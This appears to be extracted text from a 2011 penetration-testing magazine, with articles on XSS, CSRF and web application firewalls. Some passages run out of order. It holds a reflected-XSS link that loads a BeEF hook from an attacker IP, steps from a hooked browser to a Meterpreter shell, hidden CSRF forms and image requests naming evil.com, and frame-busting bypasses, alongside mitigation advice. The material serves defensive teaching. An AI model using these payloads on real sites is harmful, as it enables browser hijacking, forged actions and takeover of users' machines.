Instead of clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine rather than being displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
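The vulnerable behaviour of the PHP snippet above can be simulated in a few lines of Python. This is illustrative only; `vulnerable_page` merely mimics the unencoded echo:

```python
# Simulates the PHP echo: user input is interpolated into the
# response without any encoding whatsoever.
def vulnerable_page(search: str) -> str:
    return f"The parameter passed is {search}"

payload = "<script>alert(document.domain)</script>"
response = vulnerable_page(payload)
print(payload in response)  # True: the script tag reaches the browser intact
```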
BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacker will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7 Detecting plugins on the user's browser
Figure 8 Starting Metasploit
Figure 9 "jobs" command
Figure 10 Metasploit after clicking "Send Now"
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
a) Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
b) All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
c) White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
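The output-encoding step can be sketched with the Python standard library. This is an illustration of the principle; in PHP the equivalent would be htmlspecialchars:

```python
import html

def safe_page(search: str) -> str:
    # Encode user-controlled output before reflecting it back.
    return f"The parameter passed is {html.escape(search)}"

print(safe_page("<script>alert(1)</script>"))
# The parameter passed is &lt;script&gt;alert(1)&lt;/script&gt;
```

The payload is now rendered as inert text instead of being parsed as markup by the browser.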
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration Testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering. Email – arvind.doraiswamy@gmail.com; LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332; Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
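The first two points can be illustrated with a short Python sketch: scripting a POST request takes one line, and no Referer header is present unless the attacker deliberately adds one. The site.com/post.php endpoint comes from the article's listings; the request object is only constructed here, never sent:

```python
import urllib.parse
import urllib.request

# An attacker scripts the POST; nothing about the POST verb prevents it.
data = urllib.parse.urlencode({'message': 'I like www.evil.com'}).encode()
req = urllib.request.Request('http://site.com/post.php', data=data)

print(req.get_method())           # POST
print(req.has_header('Referer'))  # False: no referrer unless one is added
```

In the browser-based attack of Listing 1 the same effect is achieved with a hidden auto-submitting form, so "POST only" buys the defender nothing.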
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user.
Listing 1 HTML code used to bypass protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)
And here is the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario: Listing 4.
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, in order to compare them after the form is submitted.
Subverting one-time tokens is usually accomplished by brute-force attacks. Brute forcing one-time tokens is useful only if the mechanism is widely used by web developers. For example, consider the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token: Listing 2.
Listing 2 Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3 Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token'])
{
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
}
else
{
    echo "Bad request";
}
?>
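The same generate-and-check flow can be sketched in Python. This is an illustrative equivalent, not the article's PHP: it swaps md5(uniqid(rand(), TRUE)) for the secrets module and uses a constant-time comparison, with a plain dict standing in for PHP's $_SESSION:

```python
import hmac
import secrets

session = {}

def issue_token() -> str:
    """Generate an unpredictable token and store it server-side."""
    token = secrets.token_hex(16)
    session['token'] = token
    return token

def valid(submitted: str) -> bool:
    """Compare in constant time, then discard the token (one-time use)."""
    expected = session.pop('token', '')
    return hmac.compare_digest(expected, submitted)

t = issue_token()
print(valid('guess'))  # False: wrong token, and it is now consumed
t = issue_token()
print(valid(t))        # True
```

Popping the token on every check is what makes it one-time: even a correct value cannot be replayed.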
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function()
{
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if( self == top ) { document.documentElement.style.display = 'block'; }
else { top.location = self.location; }
</script>
This protects the web application even if an attacker browses the webpage with the JavaScript disabled option in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. He then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. A real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
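The attack in Listing 4 only works if the server accepts whatever token the page submits. A common server-side defense is a per-session anti-CSRF token that the server both issues and verifies. The sketch below is illustrative only (the function names and session dictionary are hypothetical, not from the article):

```python
import hmac
import secrets

def issue_token(session):
    """Store a fresh random token in the server-side session and return it
    for embedding in the form as a hidden field."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token

def is_valid_request(session, submitted_token):
    """Reject the POST unless the submitted token matches the one stored in
    the session, using a constant-time comparison."""
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    return hmac.compare_digest(expected, submitted_token)
```

A forged request from another origin cannot read the victim's token (given a working Same Origin Policy), so its submission fails the comparison.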
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas the
internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or are simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications – one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and making action anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security in the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues for web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible in the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that until now has not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that rely on nothing more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered over time, and by this time correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or as an important business process. Despite this, the demand for good code programming that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALFs) or Application-Level Gateways (ALGs). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.

Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing Web Application Security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as their maximum length, valid characters and permitted value range.
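The parameter-quality rules described above can be sketched in a few lines. This is a hedged illustration of the principle, not any vendor's implementation; the field names and limits are assumptions:

```python
import re

# Illustrative per-parameter rules: maximum length and permitted characters.
RULES = {
    "username": {"max_len": 32, "pattern": re.compile(r"^[A-Za-z0-9_.-]+$")},
    "amount":   {"max_len": 10, "pattern": re.compile(r"^[0-9]+(\.[0-9]{1,2})?$")},
}

def check_request(params, expected_count=2):
    """Block requests with an unexpected parameter count, over-long values,
    or characters outside the permitted set."""
    if len(params) > expected_count:
        return False                      # more parameters than the form defines
    for name, value in params.items():
        rule = RULES.get(name)
        if rule is None:
            return False                  # unknown parameter name
        if len(value) > rule["max_len"]:
            return False                  # over-long value
        if not rule["pattern"].match(value):
            return False                  # forbidden characters
    return True
```

A classic injection probe such as a username containing `' OR '1'='1` already fails the character-set rule, without the WAF needing to recognize the attack itself.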
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
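The combined approach can be sketched as follows. This is a simplified illustration under stated assumptions: the attack signatures, the "/order" page and its learned parameters are all hypothetical examples, not a real rule set:

```python
import re

# Negative security: a small blacklist of known attack patterns (illustrative).
BLACKLIST = [re.compile(p, re.IGNORECASE) for p in (
    r"<script\b",        # reflected XSS probe
    r"union\s+select",   # SQL injection probe
)]

# Positive security: a learned whitelist for one high-value page (assumed).
WHITELIST = {
    "/order": {"item_id": re.compile(r"^\d+$"),
               "qty":     re.compile(r"^\d{1,3}$")},
}

def allow(path, params):
    # Reject anything matching a known attack signature, site-wide.
    for value in params.values():
        if any(rx.search(value) for rx in BLACKLIST):
            return False
    # On high-value pages, only learned parameters with learned shapes pass.
    profile = WHITELIST.get(path)
    if profile is not None:
        return all(name in profile and profile[name].match(value)
                   for name, value in params.items())
    return True
```

The blacklist catches known probes everywhere with little maintenance, while the whitelist only has to be re-learned for the few pages where it is applied.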
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. And special functions are only available here: as a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without making changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But Proxy WAFs must also be configured to correspond with the respective requirements. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the frontline, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF in Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation, or resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).

These tests have to be reproduced as often as possible, and whenever a change in the application is put in place by developers.
Appropriate Response
Traditional firewalls do not filter network application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself.

This type of deployment is often called defense in depth and gives the ability to monitor the various attacks at both the application and network levels.

Last but not least, the association of the identity context with the security policy allows better detection of anomalies.
Traffic Filtering: The WAF (Web Application Firewall)
